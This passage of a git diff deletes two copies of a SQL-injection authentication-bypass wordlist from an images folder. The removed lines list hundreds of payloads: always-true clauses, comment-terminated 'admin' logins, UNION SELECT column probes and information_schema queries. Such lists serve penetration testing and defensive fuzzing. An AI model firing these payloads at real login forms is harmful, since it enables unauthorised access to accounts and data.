-" UnION SELeCT 1,2,3,4,5`
\ No newline at end of file
diff --git a/src/images/sqli-authbypass-big (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (2) (1) (1) (1) (1).txt b/src/images/sqli-authbypass-big (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (2) (1) (1) (1) (1).txt
deleted file mode 100644
index 5a03da57f..000000000
--- a/src/images/sqli-authbypass-big (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (2) (1) (1) (1) (1).txt
+++ /dev/null
@@ -1,771 +0,0 @@
-'-'
-' '
-'&'
-'^'
-'*'
-' or ''-'
-' or '' '
-' or ''&'
-' or ''^'
-' or ''*'
-"-"
-" "
-"&"
-"^"
-"*"
-" or ""-"
-" or "" "
-" or ""&"
-" or ""^"
-" or ""*"
-or true--
-" or true--
-' or true--
-") or true--
-') or true--
-' or 'x'='x
-') or ('x')=('x
-')) or (('x'))=(('x
-" or "x"="x
-") or ("x")=("x
-")) or (("x"))=(("x
-or 1=1
-or 1=1--
-or 1=1#
-or 1=1/*
-admin' --
-admin' #
-admin'/*
-admin' or '1'='1
-admin' or '1'='1'--
-admin' or '1'='1'#
-admin' or '1'='1'/*
-admin'or 1=1 or ''='
-admin' or 1=1
-admin' or 1=1--
-admin' or 1=1#
-admin' or 1=1/*
-admin') or ('1'='1
-admin') or ('1'='1'--
-admin') or ('1'='1'#
-admin') or ('1'='1'/*
-admin') or '1'='1
-admin') or '1'='1'--
-admin') or '1'='1'#
-admin') or '1'='1'/*
-1234 ' AND 1=0 UNION ALL SELECT 'admin', '81dc9bdb52d04dc20036dbd8313ed055
-admin" --
-admin" #
-admin"/*
-admin" or "1"="1
-admin" or "1"="1"--
-admin" or "1"="1"#
-admin" or "1"="1"/*
-admin"or 1=1 or ""="
-admin" or 1=1
-admin" or 1=1--
-admin" or 1=1#
-admin" or 1=1/*
-admin") or ("1"="1
-admin") or ("1"="1"--
-admin") or ("1"="1"#
-admin") or ("1"="1"/*
-admin") or "1"="1
-admin") or "1"="1"--
-admin") or "1"="1"#
-admin") or "1"="1"/*
-1234 " AND 1=0 UNION ALL SELECT "admin", "81dc9bdb52d04dc20036dbd8313ed055
-==
-=
-'
-' --
-' #
-' –
-'--
-'/*
-'#
-" --
-" #
-"/*
-' and 1='1
-' and a='a
- or 1=1
- or true
-' or ''='
-" or ""="
-1′) and '1′='1–
-' AND 1=0 UNION ALL SELECT '', '81dc9bdb52d04dc20036dbd8313ed055
-" AND 1=0 UNION ALL SELECT "", "81dc9bdb52d04dc20036dbd8313ed055
- and 1=1
- and 1=1–
-' and 'one'='one
-' and 'one'='one–
-' group by password having 1=1--
-' group by userid having 1=1--
-' group by username having 1=1--
- like '%'
- or 0=0 --
- or 0=0 #
- or 0=0 –
-' or 0=0 #
-' or 0=0 --
-' or 0=0 #
-' or 0=0 –
-" or 0=0 --
-" or 0=0 #
-" or 0=0 –
-%' or '0'='0
- or 1=1
- or 1=1--
- or 1=1/*
- or 1=1#
- or 1=1–
-' or 1=1--
-' or '1'='1
-' or '1'='1'--
-' or '1'='1'/*
-' or '1'='1'#
-' or '1′='1
-' or 1=1
-' or 1=1 --
-' or 1=1 –
-' or 1=1--
-' or 1=1;#
-' or 1=1/*
-' or 1=1#
-' or 1=1–
-') or '1'='1
-') or '1'='1--
-') or '1'='1'--
-') or '1'='1'/*
-') or '1'='1'#
-') or ('1'='1
-') or ('1'='1--
-') or ('1'='1'--
-') or ('1'='1'/*
-') or ('1'='1'#
-'or'1=1
-'or'1=1′
-" or "1"="1
-" or "1"="1"--
-" or "1"="1"/*
-" or "1"="1"#
-" or 1=1
-" or 1=1 --
-" or 1=1 –
-" or 1=1--
-" or 1=1/*
-" or 1=1#
-" or 1=1–
-") or "1"="1
-") or "1"="1"--
-") or "1"="1"/*
-") or "1"="1"#
-") or ("1"="1
-") or ("1"="1"--
-") or ("1"="1"/*
-") or ("1"="1"#
-) or '1′='1–
-) or ('1′='1–
-' or 1=1 LIMIT 1;#
-'or 1=1 or ''='
-"or 1=1 or ""="
-' or 'a'='a
-' or a=a--
-' or a=a–
-') or ('a'='a
-" or "a"="a
-") or ("a"="a
-') or ('a'='a and hi") or ("a"="a
-' or 'one'='one
-' or 'one'='one–
-' or uid like '%
-' or uname like '%
-' or userid like '%
-' or user like '%
-' or username like '%
-' or 'x'='x
-') or ('x'='x
-" or "x"="x
-' OR 'x'='x'#;
-'=' 'or' and '=' 'or'
-' UNION ALL SELECT 1, @@version;#
-' UNION ALL SELECT system_user(),user();#
-' UNION select table_schema,table_name FROM information_Schema.tables;#
-admin' and substring(password/text(),1,1)='7
-' and substring(password/text(),1,1)='7
-
-==
-=
-'
-"
-'-- 2
-'/*
-'#
-"-- 2
-" #
-"/*
-'-'
-'&'
-'^'
-'*'
-'='
-0'<'2
-"-"
-"&"
-"^"
-"*"
-"="
-0"<"2
-
-')
-")
-')-- 2
-')/*
-')#
-")-- 2
-") #
-")/*
-')-('
-')&('
-')^('
-')*('
-')=('
-0')<('2
-")-("
-")&("
-")^("
-")*("
-")=("
-0")<("2
-
-'-''-- 2
-'-''#
-'-''/*
-'&''-- 2
-'&''#
-'&''/*
-'^''-- 2
-'^''#
-'^''/*
-'*''-- 2
-'*''#
-'*''/*
-'=''-- 2
-'=''#
-'=''/*
-0'<'2'-- 2
-0'<'2'#
-0'<'2'/*
-"-""-- 2
-"-""#
-"-""/*
-"&""-- 2
-"&""#
-"&""/*
-"^""-- 2
-"^""#
-"^""/*
-"*""-- 2
-"*""#
-"*""/*
-"=""-- 2
-"=""#
-"=""/*
-0"<"2"-- 2
-0"<"2"#
-0"<"2"/*
-
-')-''-- 2
-')-''#
-')-''/*
-')&''-- 2
-')&''#
-')&''/*
-')^''-- 2
-')^''#
-')^''/*
-')*''-- 2
-')*''#
-')*''/*
-')=''-- 2
-')=''#
-')=''/*
-0')<'2'-- 2
-0')<'2'#
-0')<'2'/*
-")-""-- 2
-")-""#
-")-""/*
-")&""-- 2
-")&""#
-")&""/*
-")^""-- 2
-")^""#
-")^""/*
-")*""-- 2
-")*""#
-")*""/*
-")=""-- 2
-")=""#
-")=""/*
-0")<"2-- 2
-0")<"2#
-0")<"2/*
-
-
-'oR'2
-'oR'2'-- 2
-'oR'2'#
-'oR'2'/*
-'oR'2'oR'
-'oR(2)-- 2
-'oR(2)#
-'oR(2)/*
-'oR(2)oR'
-'oR 2-- 2
-'oR 2#
-'oR 2/*
-'oR 2 oR'
-'oR/**/2-- 2
-'oR/**/2#
-'oR/**/2/*
-'oR/**/2/**/oR'
-"oR"2
-"oR"2"-- 2
-"oR"2"#
-"oR"2"/*
-"oR"2"oR"
-"oR(2)-- 2
-"oR(2)#
-"oR(2)/*
-"oR(2)oR"
-"oR 2-- 2
-"oR 2#
-"oR 2/*
-"oR 2 oR"
-"oR/**/2-- 2
-"oR/**/2#
-"oR/**/2/*
-"oR/**/2/**/oR"
-
-'oR'2'='2
-'oR'2'='2'oR'
-'oR'2'='2'-- 2
-'oR'2'='2'#
-'oR'2'='2'/*
-'oR'2'='2'oR'
-'oR 2=2-- 2
-'oR 2=2#
-'oR 2=2/*
-'oR 2=2 oR'
-'oR/**/2=2-- 2
-'oR/**/2=2#
-'oR/**/2=2/*
-'oR/**/2=2/**/oR'
-'oR(2)=2-- 2
-'oR(2)=2#
-'oR(2)=2/*
-'oR(2)=2/*
-'oR(2)=(2)oR'
-'oR'2'='2' LimIT 1-- 2
-'oR'2'='2' LimIT 1#
-'oR'2'='2' LimIT 1/*
-'oR(2)=(2)LimIT(1)-- 2
-'oR(2)=(2)LimIT(1)#
-'oR(2)=(2)LimIT(1)/*
-"oR"2"="2
-"oR"2"="2"oR"
-"oR"2"="2"-- 2
-"oR"2"="2"#
-"oR"2"="2"/*
-"oR"2"="2"oR"
-"oR 2=2-- 2
-"oR 2=2#
-"oR 2=2/*
-"oR 2=2 oR"
-"oR/**/2=2-- 2
-"oR/**/2=2#
-"oR/**/2=2/*
-"oR/**/2=2/**/oR"
-"oR(2)=2-- 2
-"oR(2)=2#
-"oR(2)=2/*
-"oR(2)=2/*
-"oR(2)=(2)oR"
-"oR"2"="2" LimIT 1-- 2
-"oR"2"="2" LimIT 1#
-"oR"2"="2" LimIT 1/*
-"oR(2)=(2)LimIT(1)-- 2
-"oR(2)=(2)LimIT(1)#
-"oR(2)=(2)LimIT(1)/*
-
-'oR true-- 2
-'oR true#
-'oR true/*
-'oR true oR'
-'oR(true)-- 2
-'oR(true)#
-'oR(true)/*
-'oR(true)oR'
-'oR/**/true-- 2
-'oR/**/true#
-'oR/**/true/*
-'oR/**/true/**/oR'
-"oR true-- 2
-"oR true#
-"oR true/*
-"oR true oR"
-"oR(true)-- 2
-"oR(true)#
-"oR(true)/*
-"oR(true)oR"
-"oR/**/true-- 2
-"oR/**/true#
-"oR/**/true/*
-"oR/**/true/**/oR"
-
-'oR'2'LiKE'2
-'oR'2'LiKE'2'-- 2
-'oR'2'LiKE'2'#
-'oR'2'LiKE'2'/*
-'oR'2'LiKE'2'oR'
-'oR(2)LiKE(2)-- 2
-'oR(2)LiKE(2)#
-'oR(2)LiKE(2)/*
-'oR(2)LiKE(2)oR'
-"oR"2"LiKE"2
-"oR"2"LiKE"2"-- 2
-"oR"2"LiKE"2"#
-"oR"2"LiKE"2"/*
-"oR"2"LiKE"2"oR"
-"oR(2)LiKE(2)-- 2
-"oR(2)LiKE(2)#
-"oR(2)LiKE(2)/*
-"oR(2)LiKE(2)oR"
-
-admin
-admin'-- 2
-admin'#
-admin'/*
-admin"-- 2
-admin"#
-ffifdyop
-
-' UniON SElecT 1,2-- 2
-' UniON SElecT 1,2,3-- 2
-' UniON SElecT 1,2,3,4-- 2
-' UniON SElecT 1,2,3,4,5-- 2
-' UniON SElecT 1,2#
-' UniON SElecT 1,2,3#
-' UniON SElecT 1,2,3,4#
-' UniON SElecT 1,2,3,4,5#
-'UniON(SElecT(1),2)-- 2
-'UniON(SElecT(1),2,3)-- 2
-'UniON(SElecT(1),2,3,4)-- 2
-'UniON(SElecT(1),2,3,4,5)-- 2
-'UniON(SElecT(1),2)#
-'UniON(SElecT(1),2,3)#
-'UniON(SElecT(1),2,3,4)#
-'UniON(SElecT(1),2,3,4,5)#
-" UniON SElecT 1,2-- 2
-" UniON SElecT 1,2,3-- 2
-" UniON SElecT 1,2,3,4-- 2
-" UniON SElecT 1,2,3,4,5-- 2
-" UniON SElecT 1,2#
-" UniON SElecT 1,2,3#
-" UniON SElecT 1,2,3,4#
-" UniON SElecT 1,2,3,4,5#
-"UniON(SElecT(1),2)-- 2
-"UniON(SElecT(1),2,3)-- 2
-"UniON(SElecT(1),2,3,4)-- 2
-"UniON(SElecT(1),2,3,4,5)-- 2
-"UniON(SElecT(1),2)#
-"UniON(SElecT(1),2,3)#
-"UniON(SElecT(1),2,3,4)#
-"UniON(SElecT(1),2,3,4,5)#
-
-'||'2
-'||2-- 2
-'||'2'||'
-'||2#
-'||2/*
-'||2||'
-"||"2
-"||2-- 2
-"||"2"||"
-"||2#
-"||2/*
-"||2||"
-'||'2'='2
-'||'2'='2'||'
-'||2=2-- 2
-'||2=2#
-'||2=2/*
-'||2=2||'
-"||"2"="2
-"||"2"="2"||"
-"||2=2-- 2
-"||2=2#
-"||2=2/*
-"||2=2||"
-'||2=(2)LimIT(1)-- 2
-'||2=(2)LimIT(1)#
-'||2=(2)LimIT(1)/*
-"||2=(2)LimIT(1)-- 2
-"||2=(2)LimIT(1)#
-"||2=(2)LimIT(1)/*
-'||true-- 2
-'||true#
-'||true/*
-'||true||'
-"||true-- 2
-"||true#
-"||true/*
-"||true||"
-'||'2'LiKE'2
-'||'2'LiKE'2'-- 2
-'||'2'LiKE'2'#
-'||'2'LiKE'2'/*
-'||'2'LiKE'2'||'
-'||(2)LiKE(2)-- 2
-'||(2)LiKE(2)#
-'||(2)LiKE(2)/*
-'||(2)LiKE(2)||'
-"||"2"LiKE"2
-"||"2"LiKE"2"-- 2
-"||"2"LiKE"2"#
-"||"2"LiKE"2"/*
-"||"2"LiKE"2"||"
-"||(2)LiKE(2)-- 2
-"||(2)LiKE(2)#
-"||(2)LiKE(2)/*
-"||(2)LiKE(2)||"
-
-')oR('2
-')oR'2'-- 2
-')oR'2'#
-')oR'2'/*
-')oR'2'oR('
-')oR(2)-- 2
-')oR(2)#
-')oR(2)/*
-')oR(2)oR('
-')oR 2-- 2
-')oR 2#
-')oR 2/*
-')oR 2 oR('
-')oR/**/2-- 2
-')oR/**/2#
-')oR/**/2/*
-')oR/**/2/**/oR('
-")oR("2
-")oR"2"-- 2
-")oR"2"#
-")oR"2"/*
-")oR"2"oR("
-")oR(2)-- 2
-")oR(2)#
-")oR(2)/*
-")oR(2)oR("
-")oR 2-- 2
-")oR 2#
-")oR 2/*
-")oR 2 oR("
-")oR/**/2-- 2
-")oR/**/2#
-")oR/**/2/*
-")oR/**/2/**/oR("
-')oR'2'=('2
-')oR'2'='2'oR('
-')oR'2'='2'-- 2
-')oR'2'='2'#
-')oR'2'='2'/*
-')oR'2'='2'oR('
-')oR 2=2-- 2
-')oR 2=2#
-')oR 2=2/*
-')oR 2=2 oR('
-')oR/**/2=2-- 2
-')oR/**/2=2#
-')oR/**/2=2/*
-')oR/**/2=2/**/oR('
-')oR(2)=2-- 2
-')oR(2)=2#
-')oR(2)=2/*
-')oR(2)=2/*
-')oR(2)=(2)oR('
-')oR'2'='2' LimIT 1-- 2
-')oR'2'='2' LimIT 1#
-')oR'2'='2' LimIT 1/*
-')oR(2)=(2)LimIT(1)-- 2
-')oR(2)=(2)LimIT(1)#
-')oR(2)=(2)LimIT(1)/*
-")oR"2"=("2
-")oR"2"="2"oR("
-")oR"2"="2"-- 2
-")oR"2"="2"#
-")oR"2"="2"/*
-")oR"2"="2"oR("
-")oR 2=2-- 2
-")oR 2=2#
-")oR 2=2/*
-")oR 2=2 oR("
-")oR/**/2=2-- 2
-")oR/**/2=2#
-")oR/**/2=2/*
-")oR/**/2=2/**/oR("
-")oR(2)=2-- 2
-")oR(2)=2#
-")oR(2)=2/*
-")oR(2)=2/*
-")oR(2)=(2)oR("
-")oR"2"="2" LimIT 1-- 2
-")oR"2"="2" LimIT 1#
-")oR"2"="2" LimIT 1/*
-")oR(2)=(2)LimIT(1)-- 2
-")oR(2)=(2)LimIT(1)#
-")oR(2)=(2)LimIT(1)/*
-')oR true-- 2
-')oR true#
-')oR true/*
-')oR true oR('
-')oR(true)-- 2
-')oR(true)#
-')oR(true)/*
-')oR(true)oR('
-')oR/**/true-- 2
-')oR/**/true#
-')oR/**/true/*
-')oR/**/true/**/oR('
-")oR true-- 2
-")oR true#
-")oR true/*
-")oR true oR("
-")oR(true)-- 2
-")oR(true)#
-")oR(true)/*
-")oR(true)oR("
-")oR/**/true-- 2
-")oR/**/true#
-")oR/**/true/*
-")oR/**/true/**/oR("
-')oR'2'LiKE('2
-')oR'2'LiKE'2'-- 2
-')oR'2'LiKE'2'#
-')oR'2'LiKE'2'/*
-')oR'2'LiKE'2'oR('
-')oR(2)LiKE(2)-- 2
-')oR(2)LiKE(2)#
-')oR(2)LiKE(2)/*
-')oR(2)LiKE(2)oR('
-")oR"2"LiKE("2
-")oR"2"LiKE"2"-- 2
-")oR"2"LiKE"2"#
-")oR"2"LiKE"2"/*
-")oR"2"LiKE"2"oR("
-")oR(2)LiKE(2)-- 2
-")oR(2)LiKE(2)#
-")oR(2)LiKE(2)/*
-")oR(2)LiKE(2)oR("
-admin')-- 2
-admin')#
-admin')/*
-admin")-- 2
-admin")#
-') UniON SElecT 1,2-- 2
-') UniON SElecT 1,2,3-- 2
-') UniON SElecT 1,2,3,4-- 2
-') UniON SElecT 1,2,3,4,5-- 2
-') UniON SElecT 1,2#
-') UniON SElecT 1,2,3#
-') UniON SElecT 1,2,3,4#
-') UniON SElecT 1,2,3,4,5#
-')UniON(SElecT(1),2)-- 2
-')UniON(SElecT(1),2,3)-- 2
-')UniON(SElecT(1),2,3,4)-- 2
-')UniON(SElecT(1),2,3,4,5)-- 2
-')UniON(SElecT(1),2)#
-')UniON(SElecT(1),2,3)#
-')UniON(SElecT(1),2,3,4)#
-')UniON(SElecT(1),2,3,4,5)#
-") UniON SElecT 1,2-- 2
-") UniON SElecT 1,2,3-- 2
-") UniON SElecT 1,2,3,4-- 2
-") UniON SElecT 1,2,3,4,5-- 2
-") UniON SElecT 1,2#
-") UniON SElecT 1,2,3#
-") UniON SElecT 1,2,3,4#
-") UniON SElecT 1,2,3,4,5#
-")UniON(SElecT(1),2)-- 2
-")UniON(SElecT(1),2,3)-- 2
-")UniON(SElecT(1),2,3,4)-- 2
-")UniON(SElecT(1),2,3,4,5)-- 2
-")UniON(SElecT(1),2)#
-")UniON(SElecT(1),2,3)#
-")UniON(SElecT(1),2,3,4)#
-")UniON(SElecT(1),2,3,4,5)#
-')||('2
-')||2-- 2
-')||'2'||('
-')||2#
-')||2/*
-')||2||('
-")||("2
-")||2-- 2
-")||"2"||("
-")||2#
-")||2/*
-")||2||("
-')||'2'=('2
-')||'2'='2'||('
-')||2=2-- 2
-')||2=2#
-')||2=2/*
-')||2=2||('
-")||"2"=("2
-")||"2"="2"||("
-")||2=2-- 2
-")||2=2#
-")||2=2/*
-")||2=2||("
-')||2=(2)LimIT(1)-- 2
-')||2=(2)LimIT(1)#
-')||2=(2)LimIT(1)/*
-")||2=(2)LimIT(1)-- 2
-")||2=(2)LimIT(1)#
-")||2=(2)LimIT(1)/*
-')||true-- 2
-')||true#
-')||true/*
-')||true||('
-")||true-- 2
-")||true#
-")||true/*
-")||true||("
-')||'2'LiKE('2
-')||'2'LiKE'2'-- 2
-')||'2'LiKE'2'#
-')||'2'LiKE'2'/*
-')||'2'LiKE'2'||('
-')||(2)LiKE(2)-- 2
-')||(2)LiKE(2)#
-')||(2)LiKE(2)/*
-')||(2)LiKE(2)||('
-")||"2"LiKE("2
-")||"2"LiKE"2"-- 2
-")||"2"LiKE"2"#
-")||"2"LiKE"2"/*
-")||"2"LiKE"2"||("
-")||(2)LiKE(2)-- 2
-")||(2)LiKE(2)#
-")||(2)LiKE(2)/*
-")||(2)LiKE(2)||("
-' UnION SELeCT 1,2`
-' UnION SELeCT 1,2,3`
-' UnION SELeCT 1,2,3,4`
-' UnION SELeCT 1,2,3,4,5`
-" UnION SELeCT 1,2`
-" UnION SELeCT 1,2,3`
-" UnION SELeCT 1,2,3,4`
-" UnION SELeCT 1,2,3,4,5`
\ No newline at end of file
diff --git a/src/images/sqli-authbypass-big (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (2) (1) (1) (1).txt b/src/images/sqli-authbypass-big (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (2) (1) (1) (1).txt
deleted file mode 100644
index 5a03da57f..000000000
--- a/src/images/sqli-authbypass-big (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (2) (1) (1) (1).txt
+++ /dev/null
@@ -1,771 +0,0 @@
-'-'
-' '
-'&'
-'^'
-'*'
-' or ''-'
-' or '' '
-' or ''&'
-' or ''^'
-' or ''*'
-"-"
-" "
-"&"
-"^"
-"*"
-" or ""-"
-" or "" "
-" or ""&"
-" or ""^"
-" or ""*"
-or true--
-" or true--
-' or true--
-") or true--
-') or true--
-' or 'x'='x
-') or ('x')=('x
-')) or (('x'))=(('x
-" or "x"="x
-") or ("x")=("x
-")) or (("x"))=(("x
-or 1=1
-or 1=1--
-or 1=1#
-or 1=1/*
-admin' --
-admin' #
-admin'/*
-admin' or '1'='1
-admin' or '1'='1'--
-admin' or '1'='1'#
-admin' or '1'='1'/*
-admin'or 1=1 or ''='
-admin' or 1=1
-admin' or 1=1--
-admin' or 1=1#
-admin' or 1=1/*
-admin') or ('1'='1
-admin') or ('1'='1'--
-admin') or ('1'='1'#
-admin') or ('1'='1'/*
-admin') or '1'='1
-admin') or '1'='1'--
-admin') or '1'='1'#
-admin') or '1'='1'/*
-1234 ' AND 1=0 UNION ALL SELECT 'admin', '81dc9bdb52d04dc20036dbd8313ed055
-admin" --
-admin" #
-admin"/*
-admin" or "1"="1
-admin" or "1"="1"--
-admin" or "1"="1"#
-admin" or "1"="1"/*
-admin"or 1=1 or ""="
-admin" or 1=1
-admin" or 1=1--
-admin" or 1=1#
-admin" or 1=1/*
-admin") or ("1"="1
-admin") or ("1"="1"--
-admin") or ("1"="1"#
-admin") or ("1"="1"/*
-admin") or "1"="1
-admin") or "1"="1"--
-admin") or "1"="1"#
-admin") or "1"="1"/*
-1234 " AND 1=0 UNION ALL SELECT "admin", "81dc9bdb52d04dc20036dbd8313ed055
-==
-=
-'
-' --
-' #
-' –
-'--
-'/*
-'#
-" --
-" #
-"/*
-' and 1='1
-' and a='a
- or 1=1
- or true
-' or ''='
-" or ""="
-1′) and '1′='1–
-' AND 1=0 UNION ALL SELECT '', '81dc9bdb52d04dc20036dbd8313ed055
-" AND 1=0 UNION ALL SELECT "", "81dc9bdb52d04dc20036dbd8313ed055
- and 1=1
- and 1=1–
-' and 'one'='one
-' and 'one'='one–
-' group by password having 1=1--
-' group by userid having 1=1--
-' group by username having 1=1--
- like '%'
- or 0=0 --
- or 0=0 #
- or 0=0 –
-' or 0=0 #
-' or 0=0 --
-' or 0=0 #
-' or 0=0 –
-" or 0=0 --
-" or 0=0 #
-" or 0=0 –
-%' or '0'='0
- or 1=1
- or 1=1--
- or 1=1/*
- or 1=1#
- or 1=1–
-' or 1=1--
-' or '1'='1
-' or '1'='1'--
-' or '1'='1'/*
-' or '1'='1'#
-' or '1′='1
-' or 1=1
-' or 1=1 --
-' or 1=1 –
-' or 1=1--
-' or 1=1;#
-' or 1=1/*
-' or 1=1#
-' or 1=1–
-') or '1'='1
-') or '1'='1--
-') or '1'='1'--
-') or '1'='1'/*
-') or '1'='1'#
-') or ('1'='1
-') or ('1'='1--
-') or ('1'='1'--
-') or ('1'='1'/*
-') or ('1'='1'#
-'or'1=1
-'or'1=1′
-" or "1"="1
-" or "1"="1"--
-" or "1"="1"/*
-" or "1"="1"#
-" or 1=1
-" or 1=1 --
-" or 1=1 –
-" or 1=1--
-" or 1=1/*
-" or 1=1#
-" or 1=1–
-") or "1"="1
-") or "1"="1"--
-") or "1"="1"/*
-") or "1"="1"#
-") or ("1"="1
-") or ("1"="1"--
-") or ("1"="1"/*
-") or ("1"="1"#
-) or '1′='1–
-) or ('1′='1–
-' or 1=1 LIMIT 1;#
-'or 1=1 or ''='
-"or 1=1 or ""="
-' or 'a'='a
-' or a=a--
-' or a=a–
-') or ('a'='a
-" or "a"="a
-") or ("a"="a
-') or ('a'='a and hi") or ("a"="a
-' or 'one'='one
-' or 'one'='one–
-' or uid like '%
-' or uname like '%
-' or userid like '%
-' or user like '%
-' or username like '%
-' or 'x'='x
-') or ('x'='x
-" or "x"="x
-' OR 'x'='x'#;
-'=' 'or' and '=' 'or'
-' UNION ALL SELECT 1, @@version;#
-' UNION ALL SELECT system_user(),user();#
-' UNION select table_schema,table_name FROM information_Schema.tables;#
-admin' and substring(password/text(),1,1)='7
-' and substring(password/text(),1,1)='7
-
-==
-=
-'
-"
-'-- 2
-'/*
-'#
-"-- 2
-" #
-"/*
-'-'
-'&'
-'^'
-'*'
-'='
-0'<'2
-"-"
-"&"
-"^"
-"*"
-"="
-0"<"2
-
-')
-")
-')-- 2
-')/*
-')#
-")-- 2
-") #
-")/*
-')-('
-')&('
-')^('
-')*('
-')=('
-0')<('2
-")-("
-")&("
-")^("
-")*("
-")=("
-0")<("2
-
-'-''-- 2
-'-''#
-'-''/*
-'&''-- 2
-'&''#
-'&''/*
-'^''-- 2
-'^''#
-'^''/*
-'*''-- 2
-'*''#
-'*''/*
-'=''-- 2
-'=''#
-'=''/*
-0'<'2'-- 2
-0'<'2'#
-0'<'2'/*
-"-""-- 2
-"-""#
-"-""/*
-"&""-- 2
-"&""#
-"&""/*
-"^""-- 2
-"^""#
-"^""/*
-"*""-- 2
-"*""#
-"*""/*
-"=""-- 2
-"=""#
-"=""/*
-0"<"2"-- 2
-0"<"2"#
-0"<"2"/*
-
-')-''-- 2
-')-''#
-')-''/*
-')&''-- 2
-')&''#
-')&''/*
-')^''-- 2
-')^''#
-')^''/*
-')*''-- 2
-')*''#
-')*''/*
-')=''-- 2
-')=''#
-')=''/*
-0')<'2'-- 2
-0')<'2'#
-0')<'2'/*
-")-""-- 2
-")-""#
-")-""/*
-")&""-- 2
-")&""#
-")&""/*
-")^""-- 2
-")^""#
-")^""/*
-")*""-- 2
-")*""#
-")*""/*
-")=""-- 2
-")=""#
-")=""/*
-0")<"2-- 2
-0")<"2#
-0")<"2/*
-
-
-'oR'2
-'oR'2'-- 2
-'oR'2'#
-'oR'2'/*
-'oR'2'oR'
-'oR(2)-- 2
-'oR(2)#
-'oR(2)/*
-'oR(2)oR'
-'oR 2-- 2
-'oR 2#
-'oR 2/*
-'oR 2 oR'
-'oR/**/2-- 2
-'oR/**/2#
-'oR/**/2/*
-'oR/**/2/**/oR'
-"oR"2
-"oR"2"-- 2
-"oR"2"#
-"oR"2"/*
-"oR"2"oR"
-"oR(2)-- 2
-"oR(2)#
-"oR(2)/*
-"oR(2)oR"
-"oR 2-- 2
-"oR 2#
-"oR 2/*
-"oR 2 oR"
-"oR/**/2-- 2
-"oR/**/2#
-"oR/**/2/*
-"oR/**/2/**/oR"
-
-'oR'2'='2
-'oR'2'='2'oR'
-'oR'2'='2'-- 2
-'oR'2'='2'#
-'oR'2'='2'/*
-'oR'2'='2'oR'
-'oR 2=2-- 2
-'oR 2=2#
-'oR 2=2/*
-'oR 2=2 oR'
-'oR/**/2=2-- 2
-'oR/**/2=2#
-'oR/**/2=2/*
-'oR/**/2=2/**/oR'
-'oR(2)=2-- 2
-'oR(2)=2#
-'oR(2)=2/*
-'oR(2)=2/*
-'oR(2)=(2)oR'
-'oR'2'='2' LimIT 1-- 2
-'oR'2'='2' LimIT 1#
-'oR'2'='2' LimIT 1/*
-'oR(2)=(2)LimIT(1)-- 2
-'oR(2)=(2)LimIT(1)#
-'oR(2)=(2)LimIT(1)/*
-"oR"2"="2
-"oR"2"="2"oR"
-"oR"2"="2"-- 2
-"oR"2"="2"#
-"oR"2"="2"/*
-"oR"2"="2"oR"
-"oR 2=2-- 2
-"oR 2=2#
-"oR 2=2/*
-"oR 2=2 oR"
-"oR/**/2=2-- 2
-"oR/**/2=2#
-"oR/**/2=2/*
-"oR/**/2=2/**/oR"
-"oR(2)=2-- 2
-"oR(2)=2#
-"oR(2)=2/*
-"oR(2)=2/*
-"oR(2)=(2)oR"
-"oR"2"="2" LimIT 1-- 2
-"oR"2"="2" LimIT 1#
-"oR"2"="2" LimIT 1/*
-"oR(2)=(2)LimIT(1)-- 2
-"oR(2)=(2)LimIT(1)#
-"oR(2)=(2)LimIT(1)/*
-
-'oR true-- 2
-'oR true#
-'oR true/*
-'oR true oR'
-'oR(true)-- 2
-'oR(true)#
-'oR(true)/*
-'oR(true)oR'
-'oR/**/true-- 2
-'oR/**/true#
-'oR/**/true/*
-'oR/**/true/**/oR'
-"oR true-- 2
-"oR true#
-"oR true/*
-"oR true oR"
-"oR(true)-- 2
-"oR(true)#
-"oR(true)/*
-"oR(true)oR"
-"oR/**/true-- 2
-"oR/**/true#
-"oR/**/true/*
-"oR/**/true/**/oR"
-
-'oR'2'LiKE'2
-'oR'2'LiKE'2'-- 2
-'oR'2'LiKE'2'#
-'oR'2'LiKE'2'/*
-'oR'2'LiKE'2'oR'
-'oR(2)LiKE(2)-- 2
-'oR(2)LiKE(2)#
-'oR(2)LiKE(2)/*
-'oR(2)LiKE(2)oR'
-"oR"2"LiKE"2
-"oR"2"LiKE"2"-- 2
-"oR"2"LiKE"2"#
-"oR"2"LiKE"2"/*
-"oR"2"LiKE"2"oR"
-"oR(2)LiKE(2)-- 2
-"oR(2)LiKE(2)#
-"oR(2)LiKE(2)/*
-"oR(2)LiKE(2)oR"
-
-admin
-admin'-- 2
-admin'#
-admin'/*
-admin"-- 2
-admin"#
-ffifdyop
-
-' UniON SElecT 1,2-- 2
-' UniON SElecT 1,2,3-- 2
-' UniON SElecT 1,2,3,4-- 2
-' UniON SElecT 1,2,3,4,5-- 2
-' UniON SElecT 1,2#
-' UniON SElecT 1,2,3#
-' UniON SElecT 1,2,3,4#
-' UniON SElecT 1,2,3,4,5#
-'UniON(SElecT(1),2)-- 2
-'UniON(SElecT(1),2,3)-- 2
-'UniON(SElecT(1),2,3,4)-- 2
-'UniON(SElecT(1),2,3,4,5)-- 2
-'UniON(SElecT(1),2)#
-'UniON(SElecT(1),2,3)#
-'UniON(SElecT(1),2,3,4)#
-'UniON(SElecT(1),2,3,4,5)#
-" UniON SElecT 1,2-- 2
-" UniON SElecT 1,2,3-- 2
-" UniON SElecT 1,2,3,4-- 2
-" UniON SElecT 1,2,3,4,5-- 2
-" UniON SElecT 1,2#
-" UniON SElecT 1,2,3#
-" UniON SElecT 1,2,3,4#
-" UniON SElecT 1,2,3,4,5#
-"UniON(SElecT(1),2)-- 2
-"UniON(SElecT(1),2,3)-- 2
-"UniON(SElecT(1),2,3,4)-- 2
